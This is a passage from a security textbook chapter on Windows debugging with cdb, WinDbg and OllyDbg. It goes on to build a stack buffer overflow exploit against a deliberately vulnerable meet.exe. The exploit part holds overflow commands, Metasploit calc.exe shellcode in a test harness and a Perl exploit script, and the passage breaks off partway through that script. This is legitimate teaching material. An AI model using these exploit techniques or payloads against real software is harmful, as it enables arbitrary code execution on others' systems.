          provides stack canary protection. To disable it for testing, use the
          /GS- flag.
Because we’re going to be using the debugger next, let’s build meet.exe with full
debugging information and disable the stack canary functions.
NOTE The /GS switch enables Microsoft’s implementation of stack canary
protection, which is quite effective in stopping buffer overflow attacks. To
learn about existing vulnerabilities in software (before this feature was
available), we will disable it with the /GS- flag.
C:\grayhat>cl /Zi /GS- meet.c
…output truncated for brevity…
C:\grayhat>meet Mr Haxor
Hello Mr Haxor
Bye Mr Haxor
Great, now that you have an executable built with debugging information, it’s time to
install the debugger and see how debugging on Windows compares with the Unix
debugging experience.
NOTE If you use the same compiler flags all the time, you may set the
command-line arguments in the environment with a set command as follows:
C:\grayhat>set CL=/Zi /GS-
Debugging on Windows with Windows Console Debuggers
In addition to the free compiler, Microsoft also gives away their debugger. You can download
it from www.microsoft.com/whdc/devtools/debugging/installx86.mspx. This is a
10MB download that installs the debugger and several helpful debugging utilities.
When the debugger installation wizard prompts you for the location where you’d like
the debugger installed, choose a short directory name at the root of your drive.
The examples in this chapter will assume your debugger is installed in c:\debuggers
(much easier to type than C:\Program Files\Debugging Tools for Windows).
C:\debuggers>dir *.exe
Volume in drive C is LOCAL DISK
Volume Serial Number is C819-53ED
Directory of C:\debuggers
05/18/2004 12:22 PM 5,632 breakin.exe
05/18/2004 12:22 PM 53,760 cdb.exe
05/18/2004 12:22 PM 64,000 dbengprx.exe
04/16/2004 06:18 PM 68,096 dbgrpc.exe
05/18/2004 12:22 PM 13,312 dbgsrv.exe
05/18/2004 12:23 PM 6,656 dumpchk.exe
…output truncated for brevity…
CDB vs. NTSD vs. WinDbg
There are actually three debuggers in the preceding list of programs. CDB (Microsoft
Console Debugger) and NTSD (Microsoft NT Symbolic Debugger) are both character-based
console debuggers that act the same way and respond to the same commands. The
single difference is that NTSD launches a new text window when it starts, whereas CDB
inherits the command window from which it was invoked. If anyone tells you there are
other differences between the two console debuggers, they have almost certainly been
using old versions of one or the other.
The third debugger is WinDbg, a Windows debugger with a full GUI. If you are more
comfortable using GUI applications than console-based applications, you might prefer
to use WinDbg. It, again, responds to the same commands and works the same way
under the GUI as CDB and NTSD. The advantage of using WinDbg (or any other graphical
debugger) is that you can open multiple windows, each containing different data to
monitor during your program’s execution. For example, you can open one window with
your source code, a second with the accompanying assembly instructions, and a third
with your list of breakpoints.
NOTE An older version of ntsd.exe is included with Windows in the
system32 directory. Either add to your path the directory where you installed
the new debugger earlier than your Windows system32 directory, or use the
full path when launching NTSD.
Windows Debugger Commands
If you’re already familiar with debugging, the Windows debugger will be a snap to pick
up. Here’s a table of frequently used debugger commands, specifically geared to leverage
the gdb experience you’ve gotten in this book.
Command          gdb Equiv               Description
bp <address>     b *mem                  Sets a breakpoint at a specific memory address.
bp <function>    b <function>            Sets a breakpoint on a specific function. bm is handy
bm <function>                            to use with wildcards (as shown later).
bl               info b                  Lists information about existing breakpoints.
bc <ID>          delete b                Clears (deletes) a breakpoint.
g                Run                     Go/continue.
r                info reg                Displays (or modifies) register contents.
p                next or n               Step over, executes an entire function or single
                                         instruction or source line.
t                step or s               Step into or execute a single instruction.
k (kb / kP)      bt                      Displays stack backtrace, optionally also function args.
.frame <#>       up/down                 Changes the stack context used to interpret commands
                                         and local variables. “Move to a different stack frame.”
dd <address>     x /NT A                 Displays memory. dd = dword values, da = ASCII
(da / db / du)                           characters, db = byte values and ASCII, du = Unicode.
dt <variable>    p <variable>            Displays a variable’s type information and content.
dv /V            p                       Displays local variables (specific to current context).
uf <function>    disassemble <function>  Displays the assembly translation of a function or the
u <address>                              assembly at a specific address.
q                quit                    Exit debugger.
Those commands are enough to get started. You can learn more about the debugger
in the debugger.chm HTML help file found in your debugger installation directory. (Use
hh debugger.chm to open it.) The command reference specifically is under Debugger
Reference | Debugger Commands | Commands.
Symbols and the Symbol Server
The final thing you need to understand before we start debugging is the purpose of symbols.
Symbols connect function names and arguments to offsets in a compiled executable
or DLL. You can debug without symbols, but it is a huge pain. Thankfully, Microsoft
provides symbols for their released operating systems. You can download all symbols
for your particular OS, but that would require a huge amount of local disk space. A
better way to acquire symbols is to use Microsoft’s symbol server and to fetch symbols as
you need them. Windows debuggers make this easy to do by providing symsrv.dll,
which you can use to set up a local cache of symbols and specify the location to get new
symbols as you need them. This is done through the environment variable
_NT_SYMBOL_PATH. You’ll need to set this environment variable so the debugger knows
where to look for symbols. If you already have all the symbols you need locally, you can
simply set the variable to that directory like this:
C:\grayhat>set _NT_SYMBOL_PATH=c:\symbols
If you (more likely) would like to use the symbol server, the syntax is as follows:
C:\grayhat>set _NT_SYMBOL_PATH=symsrv*symsrv.dll*c:\symbols*http://msdl.microsoft.com/download/symbols
Using the preceding syntax, the debugger will first look in c:\symbols for the symbols
it needs. If it can’t find them there, it will download them from Microsoft’s public
symbols server. After it downloads them, it will place the downloaded symbols in c:\symbols,
expecting the directory to exist, so they’ll be available locally the next time they’re
needed. Setting up the symbol path to use the symbols server is a common setup, and
Microsoft has a shorter version that does exactly the same thing as the previous syntax:
C:\grayhat>set _NT_SYMBOL_PATH=srv*c:\symbols*http://msdl.microsoft.com/download/symbols
Now that we have the debugger installed, have learned the core commands, and have
set up our symbols path, let’s launch the debugger for the first time. We’ll debug
meet.exe that we built with debugging information (symbols) in the previous section.
Launching the Debugger
In this chapter, we’ll use the cdb debugger. You’re welcome to follow along with the
WinDbg GUI debugger if you’d prefer, but you may find the command-line debugger to
be an easier quick-start debugger. To launch cdb, pass it the executable to run and any
command-line arguments.
C:\grayhat>md c:\symbols
C:\grayhat>set _NT_SYMBOL_PATH=srv*c:\symbols*http://msdl.microsoft.com/download/symbols
C:\grayhat>c:\debuggers\cdb.exe meet Mr Haxor
…output truncated for brevity…
(280.f60): Break instruction exception - code 80000003 (first chance)
eax=77fc4c0f ebx=7ffdf000 ecx=00000006 edx=77f51340 esi=00241eb4 edi=00241eb4
eip=77f75554 esp=0012fb38 ebp=0012fc2c iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202
ntdll!DbgBreakPoint:
77f75554 cc int 3
0:000>
As you can see from the output of cdb, at every breakpoint it displays the contents of
all registers and the assembly that caused the breakpoint. In this case, a stack trace will
show us why we are stopped at a breakpoint:
0:000> k
ChildEBP RetAddr
0012fb34 77f6462c ntdll!DbgBreakPoint
0012fc90 77f552e9 ntdll!LdrpInitializeProcess+0xda4
0012fd1c 77f75883 ntdll!LdrpInitialize+0x186
00000000 00000000 ntdll!KiUserApcDispatcher+0x7
It turns out that the Windows debugger automatically breaks in after initializing the
process before execution begins. (You can disable this breakpoint by passing -g to cdb
on the command line.) This is handy because at this initial breakpoint, your program
has loaded, and you can set any breakpoints you’d like on your program before execution
begins. Let’s set a breakpoint on main:
0:000> bm meet!main
*** WARNING: Unable to verify checksum for meet.exe
1: 00401060 meet!main
0:000> bl
1 e 00401060 0001 (0001) 0:*** meet!main
(Ignore the checksum warning.) Let’s next run execution past the ntdll initialization
on to our main function.
NOTE During this debug session, the memory addresses shown will likely be
different than the memory addresses in your debugging session.
0:000> g
Breakpoint 1 hit
eax=00320e60 ebx=7ffdf000 ecx=00320e00 edx=00000003 esi=00000000 edi=00085f38
eip=00401060 esp=0012fee0 ebp=0012ffc0 iopl=0 nv up ei pl zr na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00000246
meet!main:
00401060 55 push ebp
0:000> k
ChildEBP RetAddr
0012fedc 004013a0 meet!main
0012ffc0 77e7eb69 meet!mainCRTStartup+0x170
0012fff0 00000000 kernel32!BaseProcessStart+0x23
(If you saw network traffic or experienced a delay right there, it was probably the
debugger downloading kernel32 symbols.) Aha! We hit our breakpoint and, again, the
registers are displayed. The command that will next run is push ebp, the first assembly
instruction in the standard function prolog. Now you may remember that in gdb, the
actual source line being executed is displayed. The way to enable that in cdb is the l+s
command. However, don’t get too accustomed to the source line display because, as a
hacker, you’ll almost never have the actual source to view. In this case, it’s fine to display
source lines at the prompt, but you do not want to turn on source mode debugging (l+t),
because if you were to do that, each “step” through the source would be one source line,
not a single assembly instruction. For more information on this topic, search for
“Debugging in Source Mode” in the debugger help (debugger.chm). On a related note,
the .lines command will modify the stack trace to display the line that is currently being
executed. You will get lines information whenever you have private symbols for the executable
or DLL you are debugging.
0:000> .lines
Line number information will be loaded
0:000> k
ChildEBP RetAddr
0012fedc 004013a0 meet!main [c:\grayhat\meet.c @ 8]
0012ffc0 77e7eb69 meet!mainCRTStartup+0x170
[f:\vs70builds\3077\vc\crtbld\crt\src\crt0.c @ 259]
0012fff0 00000000 kernel32!BaseProcessStart+0x23
If we continue past this breakpoint, our program will finish executing:
0:000> g
Hello Mr Haxor
Bye Mr Haxor
eax=c0000135 ebx=00000000 ecx=00000000 edx=00000000 esi=77f5c2d8 edi=00000000
eip=7ffe0304 esp=0012fda4 ebp=0012fe9c iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00000202
SharedUserData!SystemCallStub+0x4:
7ffe0304 c3 ret
0:000> k
ChildEBP RetAddr
0012fda0 77f5c2e4 SharedUserData!SystemCallStub+0x4
0012fda4 77e75ca4 ntdll!ZwTerminateProcess+0xc
0012fe9c 77e75cc6 kernel32!_ExitProcess+0x57
0012feb0 00403403 kernel32!ExitProcess+0x11
0012fec4 004033b6 meet!__crtExitProcess+0x43
[f:\vs70builds\3077\vc\crtbld\crt\src\crt0dat.c @ 464]
0012fed0 00403270 meet!doexit+0xd6
[f:\vs70builds\3077\vc\crtbld\crt\src\crt0dat.c @ 414]
0012fee4 004013b5 meet!exit+0x10
[f:\vs70builds\3077\vc\crtbld\crt\src\crt0dat.c @ 303]
0012ffc0 77e7eb69 meet!mainCRTStartup+0x185
[f:\vs70builds\3077\vc\crtbld\crt\src\crt0.c @ 267]
0012fff0 00000000 kernel32!BaseProcessStart+0x23
As you can see, in addition to the initial breakpoint before the program starts executing,
the Windows debugger also breaks in after the program has finished executing, just before
the process terminates. You can bypass this breakpoint by passing cdb the -G flag. Next let’s
quit out of the debugger and relaunch it (or use the .restart command) to explore the data
manipulated by the program and to look at the assembly generated by the compiler.
Exploring the Windows Debugger
We’ll next explore how to find the data the debugged application is using. First, let’s
launch the debugger and set breakpoints on main and the greeting function. In this section,
again, the memory addresses shown will likely be different from the memory
addresses you see, so be sure to check where a value is coming from in this example output
before using it directly yourself.
C:\grayhat>c:\debuggers\cdb.exe meet Mr Haxor
...
0:000> bm meet!main
*** WARNING: Unable to verify checksum for meet.exe
1: 00401060 meet!main
0:000> bm meet!*greet*
2: 00401020 meet!greeting
0:000> g
Breakpoint 1 hit
...
meet!main:
00401060 55 push ebp
0:000>
From looking at the source, we know that main should have been passed the command
line used to launch the program via the argc command string counter and argv,
which points to the array of strings. To verify that, we’ll use dv to list the local variables,
and then poke around in memory with dt and db to find the value of those variables.
0:000> dv /V
0012fee4 @ebp+0x08 argc = 3
0012fee8 @ebp+0x0c argv = 0x00320e00
0:000> dt argv
Local var @ 0x12fee8 Type char**
0x00320e00
-> 0x00320e10 "meet"
From the dv output, we see that argc and argv are, indeed, local variables with argc
stored 8 bytes past the local ebp, and argv stored at ebp+0xc. The dt command shows
the data type of argv to be a pointer to a character pointer. The address 0x00320e00
holds that pointer to 0x00320e10 where the data actually lives. Again, these are our values—
yours will probably be different.
0:000> db 0x00320e10
00320e10 6d 65 65 74 00 4d 72 00-48 61 78 6f 72 00 fd fd meet.Mr.Haxor...
Let’s continue on until we hit our second breakpoint at the greeting function.
0:000> g
Breakpoint 2 hit
...
meet!greeting:
00401020 55 push ebp
0:000> kP
ChildEBP RetAddr
0012fecc 00401076 meet!greeting(
char * temp1 = 0x00320e15 "Mr",
char * temp2 = 0x00320e18 "Haxor")
0012fedc 004013a0 meet!main(
int argc = 3,
char ** argv = 0x00320e00)+0x16
0012ffc0 77e7eb69 meet!mainCRTStartup(void)+0x170
0012fff0 00000000 kernel32!BaseProcessStart+0x23
You can see from the stack trace (or the code) that greeting is passed the two arguments
we passed into the program as char *. So you might be wondering, “how is the
stack currently laid out?” Let’s look at the local variables and map it out.
0:000> dv /V
0012fed4 @ebp+0x08 temp1 = 0x00320e15 "Mr"
0012fed8 @ebp+0x0c temp2 = 0x00320e18 "Haxor"
0012fd3c @ebp-0x190 name = char [400] "???"
The variable name is at ebp-0x190, that is, 0x190 bytes before ebp in memory. Unless you think in hex, you need to convert
that to decimal to put together a picture of the stack. You can use calc.exe to compute
that or just ask the debugger to show the value 190 in different formats, like this:
0:000> .formats 190
Evaluate expression:
Hex: 00000190
Decimal: 400
So our variable name starts 0x190 (400) bytes before ebp, at a lower address, and our two
arguments sit a few bytes after ebp. Let’s do the math and see exactly how many bytes are
between the variables and then reconstruct the entire stack frame. If you’re following
along, step past the function prolog, where the stack frame is set up, before trying to
match up the numbers. We’ll go through the assembly momentarily.
For now, just enter p three times to get past the prolog and then display the registers. (pr
toggles the register display along the way.)
0:000> pr
meet!greeting+0x1:
00401021 8bec mov ebp,esp
0:000> p
meet!greeting+0x3:
00401023 81ec90010000 sub esp,0x190
0:000> pr
eax=00320e15 ebx=7ffdf000 ecx=00320e18 edx=00320e00 esi=00000000 edi=00085f38
eip=00401029 esp=0012fd3c ebp=0012fecc iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00000206
meet!greeting+0x9:
00401029 8b450c mov eax,[ebp+0xc] ss:0023:0012fed8=00320e18
All right, let’s build up a picture of the stack, starting from the top of this stack frame
(esp). At esp (0x0012fd3c for us; it might be different for you), we find the function variable
name, which then goes on for the next 400 (0x190) bytes. Let’s see what comes
next:
0:000> .formats esp+190
Evaluate expression:
Hex: 0012fecc
Okay, esp+0x190 (or esp+400 bytes) is 0x0012fecc. That value looks familiar. In fact,
if you look at the preceding registers display (or use the r command), you’ll see that ebp
is 0x0012fecc. So ebp points directly after name, where the caller’s saved ebp is stored. We know that ebp is a 4-byte pointer,
so let’s see what’s after that.
0:000> dd esp+190+4 l1
0012fed0 00401076
NOTE The l1 (the letter l followed by the number 1) after the address tells
the debugger to display only one of whatever type is being displayed. In this
case, we are displaying double words (4 bytes) and we want to display one (1)
of them. For more info on range specifiers, see the debugger.chm HTML help
topic “Address and Address Range Syntax.”
That’s another value that looks familiar. This time, it’s the function return address:
0:000> k
ChildEBP RetAddr
0012fecc 00401076 meet!greeting+0x9
0012fedc 004013a0 meet!main+0x16
0012ffc0 77e7eb69 meet!mainCRTStartup+0x170
0012fff0 00000000 kernel32!BaseProcessStart+0x23
When you correlate the next adjacent memory address and the stack trace, you see
that the return address (saved eip) is stored next on the stack. And after eip come our
function parameters that were passed in:
0:000> dd esp+190+4+4 l1
0012fed4 00320e15
0:000> db 00320e15
00320e15 4d 72 00 48 61 78 6f 72-00 fd fd fd fd ab ab ab Mr.Haxor........
Now that we have inspected memory ourselves, we can believe the graph shown in
Chapter 7, shown again in Figure 11-1.
Disassembling with CDB
To disassemble using the Windows debugger, use the u or uf (unassemble function)
command. The u command will disassemble a few instructions, with subsequent u
commands disassembling the next few instructions. In this case, because we want to see
the entire function, we’ll use uf.
0:000> uf meet!greeting
meet!greeting:
00401020 55 push ebp
00401021 8bec mov ebp,esp
00401023 81ec90010000 sub esp,0x190
00401029 8b450c mov eax,[ebp+0xc]
0040102c 50 push eax
0040102d 8d8d70feffff lea ecx,[ebp-0x190]
00401033 51 push ecx
00401034 e8f7000000 call meet!strcpy (00401130)
00401039 83c408 add esp,0x8
0040103c 8d9570feffff lea edx,[ebp-0x190]
00401042 52 push edx
00401043 8b4508 mov eax,[ebp+0x8]
00401046 50 push eax
00401047 68405b4100 push 0x415b40
0040104c e86f000000 call meet!printf (004010c0)
00401051 83c40c add esp,0xc
00401054 8be5 mov esp,ebp
00401056 5d pop ebp
00401057 c3 ret
If you cross-reference this disassembly with the disassembly created on Linux in
Chapter 6, you’ll find it to be almost identical. The trivial differences are in choice of registers
and semantics.
Figure 11-1 Stack layout of function call
References
Information on /GS[-] flag http://msdn2.microsoft.com/en-gb/library/8dbf701c.aspx
Compiler Flags http://msdn2.microsoft.com/en-gb/library/fwkeyyhe.aspx
Debugging on Windows with OllyDbg
A popular user-mode debugger is OllyDbg, which can be found at www.ollydbg.de. As
can be seen in Figure 11-2, the OllyDbg main screen is split into four sections. The Code
section is used to view assembly of the binary. The Registers section is used to monitor
the status of registers in real time. The Hex Dump section is used to view the raw hex of
the binary. The Stack section is used to view the stack in real time. Each section has context-
sensitive menus available by right-clicking in that section.
You may start debugging a program with OllyDbg in three ways:
• Open OllyDbg program; then select File | Open.
• Open OllyDbg program; then select File | Attach.
• Invoke from command line, for example, from a Metasploit shell as follows:
$ Perl -e "exec '<path to OllyDbg>', '<program to debug>', '<arguments>'"
Figure 11-2 Main screen of OllyDbg
For example, to debug our favorite meet.exe and send it 408 As, simply type
$ Perl -e "exec 'F:\\toolz\\odbg110\\OLLYDBG.EXE', 'c:\\meet.exe', 'Mr',('A' x 408)"
The preceding command line will launch meet.exe inside of OllyDbg.
When learning OllyDbg, you will want to know the following common commands:
Shortcut                                 Purpose
F2                                       Set breakpoint (bp)
F7                                       Step into a function
F8                                       Step over a function
F9                                       Continue to next bp, exception, or exit
CTRL-K                                   Show call tree of functions
SHIFT-F9                                 Pass exception to program to handle
Click in code section, press ALT-E       List of linked executable modules
Right-click on register value, select    Look at stack or memory location that
Follow in Stack or Follow in Dump        corresponds to register value
CTRL-F2                                  Restart debugger
When you launch a program in OllyDbg, the debugger automatically pauses. This
allows you to set breakpoints and examine the target of the debugging session before
continuing. It is always a good idea to start off by checking what executable modules are
linked to our program (ALT-E).
In this case, we see that only kernel32.dll and ntdll.dll are linked to meet.exe. This information
is useful to us. We will see later that those programs contain opcodes that are
available to us when exploiting.
Now we are ready to begin the analysis of this program. Since we are interested in the
strcpy in the greeting function, let’s find it by starting with the Executable Modules window
we already have open (ALT-E). Double-click on the meet module from the executable
modules window and you will be taken to the function pointers of the meet.exe
program. You will see all the functions of the program, in this case greeting and main.
Arrow down to the “JMP meet.greeting” line and press ENTER to follow that JMP statement
into the greeting function.
NOTE If you do not see the symbol names such as “greeting”, “strcpy”, and
“printf”, then either you have not compiled the binary with debugging
symbols, or your OllyDbg symbols server needs to be updated by copying the
dbghelp.dll and symsrv.dll files from your debuggers directory to the OllyDbg
folder. Missing symbols are not a problem; the names are merely a convenience,
and you can work without them.
Now that we are looking at the greeting function, let’s set a breakpoint at the vulnerable
function call (strcpy). Arrow down until we get to line 0x00401034. At this line press
F2 to set a breakpoint; the address should turn red. Breakpoints allow us to return to this
point quickly. For example, at this point we will restart the program with CTRL-F2 and
then press F9 to continue to the breakpoint. You should now see OllyDbg has halted on
the function call we are interested in (strcpy).
Now that we have a breakpoint set on the vulnerable function call (strcpy), we can
continue by stepping over the strcpy function (press F8). As the registers change, you will
see them turn red. Since we just executed the strcpy function call, you should see many
of the registers turn red. Continue stepping through the program until you get to line
0x00401057, which is the RETN from the greeting function. You will notice that the
debugger realizes the function is about to return and provides you with useful information.
For example, since the saved eip has been overwritten with four As, the debugger
indicates that the function is about to return to 0x41414141. Also notice how the function
epilog has copied ebp into esp and then popped four As into ebp, leaving esp pointing
at the overwritten return address (0x0012FF64 on the stack).
As expected, when you press F8 one more time, the program will fire an exception. This is
called a first chance exception, as the debugger and program are given a chance to handle
the exception before the program crashes. You may pass the exception to the program
by pressing SHIFT-F9. In this case, since there are no exception handlers in place, the program
crashes.
After the program crashes, you may continue to inspect memory locations. For example,
you may click in the stack section and scroll up to see the previous stack frame (that
we just returned from, which is now grayed out). You can see (on our system) that the
beginning of our malicious buffer was at 0x0012FDD0.
To continue inspecting the state of the crashed machine, within the stack section,
scroll back down to the current stack frame (current stack frame will be highlighted).
You may also return to the current stack frame by clicking on the ESP register value to
select it, then right-clicking on that selected value and selecting Follow in Stack. You will
notice that a copy of the buffer is also located at the location esp+4. Information like
this becomes valuable later as we choose an attack vector.
Those of you who are visually oriented will find OllyDbg very useful. Remember,
OllyDbg only works in user space. If you need to dive into kernel space, you will have to
use another debugger like WinDbg or SoftICE.
Reference
Information on fixing OllyDbg www.exetools.com/forum/showthread.php?t=5971&goto=nextoldest
Windows Exploits
In this section, we will learn to exploit Windows systems. We will start off slowly, building
on previous concepts learned in the Linux chapters. Then we will take a leap into
reality and work on a real-world Windows exploit.
Building a Basic Windows Exploit
Now that you’ve learned how to debug on Windows, how to disassemble on Windows,
and about the Windows stack layout, you’re ready to write a Windows exploit! This section
will mirror the Chapter 7 exploit examples that you completed on Linux to show you
that the same kind of exploits are written the same way on Windows. The end goal of this
section is to cause meet.exe to launch an executable of our choice based on shellcode
passed in as arguments. We will use shellcode written by H.D. Moore for his Metasploit
project (see Chapter 5 for more info on Metasploit). Before we can drop shellcode into the
arguments to meet.exe, however, we need to prove that we can first crash meet.exe and
then control eip instead of crashing, and then finally navigate to our shellcode.
Crashing meet.exe and Controlling eip
As you saw from Chapter 7, a long parameter passed to meet.exe will cause a segmentation
fault on Linux. We’d like to cause the same type of crash on Windows, but Perl is not
included on Windows. So to build this exploit, you’ll need to either use the Metasploit
Cygshell or download ActivePerl from www.activestate.com/Products/ActivePerl/ to
your Windows machine. (It’s free.) Both work well. Since we have used the Metasploit
Cygshell so far, you may continue using that throughout this chapter if you like. To show
you the other side, we will try ActivePerl for the rest of this section. After you download
and install Perl for Windows, you can use it to build malicious parameters to pass to
meet.exe. Windows, however, does not support the same backtick (`) notation we used
on Linux to build up command strings, so we’ll use Perl as our execution environment
and our shellcode generator. You can do this all on the command line, but it might be
handy to instead build a simple Perl script that you can modify as we add more and
more to this exploit throughout the section. We’ll use the exec Perl command to execute
arbitrary commands and also to explicitly break up command-line arguments (as this
demo is heavy on the command-line arguments).
C:\grayhat>type command.pl
exec 'c:\\debuggers\\ntsd','-g','-G','meet','Mr.',("A" x 500)
Because the backslash is a special escape character to Perl, we need to include two of
them each time we use it. Also, we’re moving to ntsd for the next few exploits so the
command-line interpreter doesn’t try to interpret the arguments we’re passing. If you
experiment later in the chapter with cdb instead of ntsd, you’ll notice odd behavior,
with debugger commands you type sometimes going to the command-line interpreter
instead of the debugger. Moving to ntsd will remove the interpreter from the picture.
C:\grayhat>Perl command.pl
... (moving to the new window) ...
Microsoft (R) Windows Debugger Version 6.6.0007.5
Copyright (C) Microsoft Corporation. All rights reserved.
CommandLine: meet Mr. AAAAAAA [rest of As removed]
...
(740.bd4): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=41414141 ebx=7ffdf000 ecx=7fffffff edx=7ffffffe esi=00080178 edi=00000000
eip=00401d7c esp=0012fa4c ebp=0012fd08 iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00010206
*** WARNING: Unable to verify checksum for meet.exe
meet!_output+0x63c:
00401d7c 0fbe08 movsx ecx,byte ptr [eax] ds:0023:41414141=??
0:000> kP
ChildEBP RetAddr
0012fd08 00401112 meet!_output(
struct _iobuf * stream = 0x00415b90,
char * format = 0x00415b48 " %s.",
char * argptr = 0x0012fd38 "??")+0x63c
0012fd28 00401051 meet!printf(
char * format = 0x00415b40 "Hello %s %s.",
int buffing = 1)+0x52
0012fecc 41414141 meet!greeting(
char * temp1 = 0x41414141 "",
char * temp2 = 0x41414141 "")+0x31
WARNING: Frame IP not in any known module. Following frames may be wrong.
41414141 00000000 0x41414141
0:000>
As you can see from the stack trace (and as you might suspect because you’ve done
this before), 500 As ran past the saved return address and also corrupted the parameters
passed to the greeting function, so the program crashes inside printf before greeting
can return. You know from Chapter 7 and from our stack construction
section earlier that eip starts 404 bytes after the start of the name buffer and is 4 bytes
long. We want to overwrite the range of bytes 404–408 past the beginning of name.
Here’s what that looks like:
C:\grayhat>Perl -e "exec 'c:\\debuggers\\ntsd','-g','-G','meet','Mr.',('A' x 408)"
... (debugger loads in new window) ...
CommandLine: meet Mr. AAAAAAAAAAAAAAAAAAAAAAAAAA [rest of As removed]
(9bc.56c): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=000001a3 ebx=7ffdf000 ecx=00415b90 edx=00415b90 esi=00080178 edi=00000000
eip=41414141 esp=0012fed4 ebp=41414141 iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00010206
41414141 ?? ???
0:000>
We now control eip! The next step is to test our chosen shellcode, and then we’ll put
the pieces together to build the exploit.
Testing the Shellcode
Just as we did with Aleph1’s shellcode in Linux, let’s build a simple test of the shellcode.
The Metasploit shellcode is well respected in the security community, so we’ll build this
first exploit test using Metasploit shellcode. Remember that our goal is to cause meet.exe
to launch an executable of our choice based on the shellcode. For this demo, let’s force
meet.exe to launch the Windows calculator, calc.exe. Metasploit’s web page will build
custom shellcode for us by filling in a few fields in a web form. Browse to
www.metasploit.com:55555/PAYLOADS?MODE=SELECT&MODULE=win32_exec
Set the CMD field to calc.exe and click Generate Payload. Figure 11-3 shows what the
web page should look like before clicking Generate Payload.
On the resulting page, copy the C-formatted shellcode (the first set of shellcode) into
the test program you built in Chapter 7 to exercise the shellcode:
C:\grayhat>type shellcode.c
/* win32_exec - EXITFUNC=seh CMD=calc.exe Size=164 Encoder=PexFnstenvSub
#http://metasploit.com */
unsigned char scode[] =
"\x31\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x1e"
"\x46\xd4\xd6\x83\xeb\xfc\xe2\xf4\xe2\xae\x90\xd6\x1e\x46\x5f\x93"
"\x22\xcd\xa8\xd3\x66\x47\x3b\x5d\x51\x5e\x5f\x89\x3e\x47\x3f\x9f"
"\x95\x72\x5f\xd7\xf0\x77\x14\x4f\xb2\xc2\x14\xa2\x19\x87\x1e\xdb"
"\x1f\x84\x3f\x22\x25\x12\xf0\xd2\x6b\xa3\x5f\x89\x3a\x47\x3f\xb0"
"\x95\x4a\x9f\x5d\x41\x5a\xd5\x3d\x95\x5a\x5f\xd7\xf5\xcf\x88\xf2"
"\x1a\x85\xe5\x16\x7a\xcd\x94\xe6\x9b\x86\xac\xda\x95\x06\xd8\x5d"
"\x6e\x5a\x79\x5d\x76\x4e\x3f\xdf\x95\xc6\x64\xd6\x1e\x46\x5f\xbe"
"\x22\x19\xe5\x20\x7e\x10\x5d\x2e\x9d\x86\xaf\x86\x76\xb6\x5e\xd2"
"\x41\x2e\x4c\x28\x94\x48\x83\x29\xf9\x25\xb5\xba\x7d\x68\xb1\xae"
"\x7b\x46\xd4\xd6";
int main()
{
int *ret; // ret pointer for manipulating saved return
ret = (int *)&ret + 2; // set ret to point to the saved return
// value on the stack.
(*ret) = (int)scode;
}
C:\grayhat>cl shellcode.c
...
C:\grayhat>shellcode.exe
This harness should simply run our shellcode, which in turn launches calc.exe. The
shellcode isn’t optimized for calc.exe, but it’s definitely easier to get non-optimized
shellcode from a web page than to build optimized shellcode ourselves. The result of
this execution is shown in Figure 11-4.
Bingo—the shellcode works! You may be wondering why the program crashed after
calling the calculator. As seen in Figure 11-3, the default setting for EXITFUNC is “seh”,
which will expect a stored exception handler when exiting. Since we don’t have any
stored exception handlers registered, the program will crash. To avoid this, we could
have selected “thread” to safely kill the thread when exiting the main function. Now let’s
move on toward our goal of exploiting meet.exe to do the same thing.
Figure 11-3 Screenshots of Metasploit shellcode generator
Getting the Return Address
Just as you did with Linux, build a small utility to get the return address:
C:\grayhat>type get_sp.c
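#include <stdio.h>
/* Return the current stack pointer (MSVC inline assembly, 32-bit x86). */
unsigned int get_sp(void) { __asm mov eax, esp }
int main(void){
printf("Stack pointer (ESP): 0x%x\n", get_sp());
return 0;
}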
C:\grayhat>cl get_sp.c
... (compiler output removed for brevity) ...
C:\grayhat>get_sp.exe
Stack pointer (ESP): 0x12ff60
On this Windows XP machine, we can reliably use the stack pointer address 0x0012ff60
in this specific situation. Notice, however, that the first byte of the 4-byte pointer address is
0x00 (get_sp.exe doesn’t show it explicitly, but it is implied because it shows only 3 bytes).
The strcpy we are about to exploit will stop copying when it hits that null byte (0x00).
Thankfully, the null byte comes as the first byte of the address and we will be reversing it to
place it on the stack, so the null byte will safely become the last byte passed on the command
line. This means we can still pull off the exploit, but we can’t repeat the return
address. In this case, our exploit sandwich will be a short nop sled, the shellcode, nops to
extend to byte 404, then a single copy of our return address at byte 404.
Figure 11-4 Testing our shellcode to execute the calc.exe command
Building the Exploit Sandwich
Let’s go back to our command.pl to build the exploit. For this, you’ll want to again copy
and paste the Metasploit shellcode generated earlier. This time, use the Perl-formatted
shellcode on the generated shellcode result page to save yourself some reformatting. (Or
you can just paste in the C-formatted shellcode and add a period after each line.) This
version of the shellcode is 164 bytes, and we want the shellcode and our nops to extend
404 bytes, so we’ll start with a 24-byte nop sled and 216 more nops (or anything, really)
after the shellcode. Also, we need to subtract 408 bytes (0x190 + 0x8) from the return
address so we end up right at the top of our nop sled where execution will slide right
into our shellcode. Let’s try it out!
NOTE Depending on the version of Metasploit and other settings you select,
the size of your shellcode may vary. It is the process that is important here,
not the exact size of the example.
C:\grayhat>type command.pl
# win32_exec - EXITFUNC=thread CMD=calc.exe Size=164 Encoder=PexFnstenvSub
#http://metasploit.com
my $shellcode =
"\x2b\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xb6".
"\x9d\x6d\xaf\x83\xeb\xfc\xe2\xf4\x4a\x75\x29\xaf\xb6\x9d\xe6\xea".
"\x8a\x16\x11\xaa\xce\x9c\x82\x24\xf9\x85\xe6\xf0\x96\x9c\x86\xe6".
